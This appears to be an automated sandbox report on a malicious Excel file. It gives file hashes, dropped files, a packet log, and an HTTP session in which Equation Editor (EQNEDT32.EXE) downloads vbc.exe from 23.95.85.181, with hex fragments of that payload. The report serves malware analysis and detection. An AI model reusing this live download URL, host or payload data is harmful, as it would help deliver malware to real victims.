Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.286624517223784
Encrypted:	false
SSDEEP:	1536:yzqGcUKFGnMrpxAcbsasHpL9T8oOmhfIRorEjZyZt:fcnM1rQa2dRPrEtyZt
MD5:	451E4CD68C69C2C8B8FC93AD02E8754A
SHA1:	B87D041383FA59A21BFF9666756EFA2784282199
SHA-256:	E406C6674E19F2F3368E26AD4E6D672B190EA5DF8CB1B5E95C9E22FB8C80738B
SHA-512:	FE42A6AFBD37EC5D20EC0C22153489EE0CA4A636FE8312DBF9554BEBE7C6D3D0E9AD602C3A746304F150561650FB2A887CFC10B3AD727A2FAB0A72A5A9D11911
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 36%, Browse Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.....................@....................@.................................`u......................................$...(...........................................................................(... .......L............................text...`........................... ..`.data...............................@....rsrc............ ..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.989085616874321
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
File size:	604672
MD5:	4a1d13469a6c817242e8b567bf34ab9a
SHA1:	a0d54f6c1205defad5f31cadf3393880e7c4c862
SHA256:	65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
SHA512:	a89649b90fe5900f3a014d84cee247df5ee514066bc2b58b968eea203d5290db6964aa5e6f5169cd4830121b0044c620c55db1089bb6c73c1af18f7a82729bf8
SSDEEP:	12288:qZLku7r1BAIE1ZoW3Y86UpOSHnSN3YfPwllSoaDuze:qFTrTVE1ZaMQSSWHwMDX
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 11:06:58.303368092 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.414326906 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.414500952 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.415296078 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.527717113 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.527765036 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.527795076 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.527822018 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.527827978 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.527884960 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.527894020 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.527899981 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639437914 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639503956 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639558077 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639612913 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639638901 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639668941 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639679909 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639683962 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639719963 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639729977 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639784098 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639786959 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639862061 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.639868021 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.639909983 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751514912 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751585960 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751637936 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751701117 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751755953 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751758099 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751780033 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751806974 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751808882 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751848936 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751859903 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751893997 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751910925 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.751948118 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.751961946 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752000093 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752012968 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752074003 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752083063 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752116919 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752137899 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752180099 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752190113 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752227068 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752237082 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752274036 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752285957 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752324104 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.752332926 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.752370119 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.754930973 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863239050 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863287926 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863311052 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863333941 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863356113 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863379002 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863401890 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863421917 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863425016 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863445997 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863446951 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863451004 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863464117 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863468885 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863487005 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863502026 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863915920 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863938093 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863957882 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863976955 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.863977909 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.863996029 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864001989 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864012003 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864025116 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864036083 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864044905 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864053965 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864065886 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864069939 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864085913 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864099979 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864105940 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864115000 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864126921 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864140034 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864145994 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864159107 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864168882 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864176035 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864192009 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864204884 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864214897 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864226103 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864236116 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864243984 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864255905 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864267111 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864276886 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864284992 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864298105 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864308119 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864320993 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864327908 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864346027 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864365101 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864367962 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.864379883 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.864397049 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.865473986 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.974407911 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974447966 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974473000 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974495888 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974519968 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974548101 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974574089 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974596977 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974620104 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974643946 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974666119 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974689960 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974706888 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.974711895 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974739075 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974762917 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974785089 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974798918 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.974808931 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974833012 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974854946 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974879026 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974901915 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974903107 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.974929094 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974952936 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.974975109 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.975037098 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.976111889 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976145983 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976170063 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976192951 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976214886 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976238012 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976262093 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976290941 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.976319075 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.976330042 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.976341009 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976358891 CEST	80	49165	23.95.85.181	192.168.2.22
Sep 15, 2021 11:06:58.976383924 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.976397038 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:58.977029085 CEST	49165	80	192.168.2.22	23.95.85.181
Sep 15, 2021 11:06:59.529771090 CEST	49165	80	192.168.2.22	23.95.85.181

HTTP Request Dependency Graph

23.95.85.181

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	23.95.85.181	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 11:06:58.415296078 CEST	0	OUT	GET /0789/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 23.95.85.181 Connection: Keep-Alive
Sep 15, 2021 11:06:58.527717113 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 09:06:58 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Last-Modified: Wed, 15 Sep 2021 06:03:24 GMT ETag: "1e000-5cc0274c3638e" Accept-Ranges: bytes Content-Length: 122880 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00 ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00 60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00 00 d0 01 00 f6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELK@@`u$(( L.text` `.data@.rsrc @@IMSVBVM60.DLL
Sep 15, 2021 11:06:58.527765036 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 11:06:58.527795076 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 11:06:58.527822018 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 11:06:58.639437914 CEST	7	IN	Data Raw: 41 00 8b 5a 41 00 fd 5a 41 00 6f 5b 41 00 e1 5b 41 00 53 5c 41 00 c5 5c 41 00 37 5d 41 00 a9 5d 41 00 1b 5e 41 00 8d 5e 41 00 ff 5e 41 00 71 5f 41 00 e3 5f 41 00 55 60 41 00 c7 60 41 00 39 61 41 00 ab 61 41 00 1d 62 41 00 8f 62 41 00 01 63 41 00 Data Ascii: AZAZAo[A[AS\A\A7]A]A^A^A^Aq_A_AU`A`A9aAaAbAbAcAscAcAWdAdA;eAeAfAfAgAugAgAYhAhA=iAiA!jAjAkAwkAkA[lAlA?mAmA#nAnAoAyoAoA]pApAAqAqA%rArAsA{sAsA_tAtAC
Sep 15, 2021 11:06:58.639503956 CEST	8	IN	Data Raw: 01 01 08 00 64 65 72 65 6c 69 63 74 00 05 59 07 04 01 0c 08 ef 01 12 01 00 ff 03 34 00 00 00 03 0f 00 53 75 62 73 74 61 67 65 73 74 72 61 66 69 37 00 01 01 0b 00 52 61 61 68 65 64 61 73 63 69 39 00 05 b6 06 da 00 8c 08 ef 01 12 02 00 ff 03 2e 00 Data Ascii: derelictY4Substagestrafi7Raahedasci9.omdigtningPIGMAKINGS7FAGFORENINGSFBlaalersseniors8)=v1TagassuidAstringespisegd"[4DRI
Sep 15, 2021 11:06:58.639558077 CEST	10	IN	Data Raw: a8 3f d7 e9 5d d7 18 8c 1a 8e b1 8c 3b 52 4a ff 18 93 70 37 31 d7 99 1e 2b d8 a4 a5 dc e3 bd 4f 3e 3d 58 f3 86 56 b5 52 27 a5 05 bd 3b ee 52 f7 69 f3 4c 8f 67 90 71 31 07 d7 99 f9 18 cb 72 3a 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 Data Ascii: ?];RJp71+O>=XVR';RiLgq1r:^^^^^^^^^^^^^^^^^^^^^^^^^eSev]oa&CL)hJSP&;v5~ivJVR:5Oj&XOByMV
Sep 15, 2021 11:06:58.639612913 CEST	11	IN	Data Raw: 24 77 5d d7 1c bc d4 5a 96 74 5d d7 20 e8 7d f4 91 10 d8 1d 18 b7 6c a0 a8 88 3b 7e d1 02 dc 26 e3 27 0f b4 a1 bc dc 26 d3 4f a4 4d 1d 8a 0c 5c 14 79 5f d7 99 89 c8 4f 99 76 5d 3f b4 89 a2 28 12 3a 79 df 12 77 1d 5e 98 ce 30 e3 dd 52 65 3b ac 27 Data Ascii: $w]Zt] }l;~&'&OM\y_Ov]?(:yw^0Re;'yuW`9hQ5 [~]<^^^^^^^^^^^^^^^^^^^^^^^^NSw#y?]&Y Xd#y/dqG-v]^$z_D
Sep 15, 2021 11:06:58.639668941 CEST	13	IN	Data Raw: eb 65 9b 62 7c 2f ea c8 c4 9c 68 8b 3e 38 9f 3c 64 33 be d2 f9 fc cc e4 40 aa 81 f8 bb 3f 40 89 a2 28 c0 cd 4d 42 2b 17 65 32 18 b5 b9 28 5d b1 dc 24 f8 48 d0 7d 18 9d c8 7d 63 f5 d9 1c 10 e3 dd d5 99 76 e7 12 5d cc 83 56 6b 87 5c 6f fb 10 d8 0e Data Ascii: eb\|/h>8<d3@?@(MB+e2(]$H}}cv]Vk\o'O`(hpJWv]NR\~v`vC&KRS]]zynv]H$v9 ;Vpo(@Wzj<^^^^^^^^^^^^^^^^
Sep 15, 2021 11:06:58.639729977 CEST	14	IN	Data Raw: fa 95 6c 56 68 5c a6 3e fe f7 9c 59 3c 81 f7 56 58 31 f7 d6 66 27 d6 5a 71 77 5d d7 1a b1 59 5e 0c 1f 5c d7 99 ff a7 85 1d 82 d6 42 f0 77 5d d7 a5 52 d4 52 f6 74 5d d7 21 f9 39 92 68 43 0f 50 c0 e5 68 89 54 17 b8 e2 19 58 20 50 c9 fd d8 b8 9b 76 Data Ascii: lVh\>Y<VX1f'Zqw]Y^\Bw]RRt]!9hCPhTX Pv]![jDw]&D&KKVn.(.(5\$\Kv]ZUw]\\Pvv]o4iUCl^^^^^^^^^^^^^^^^^^^^^
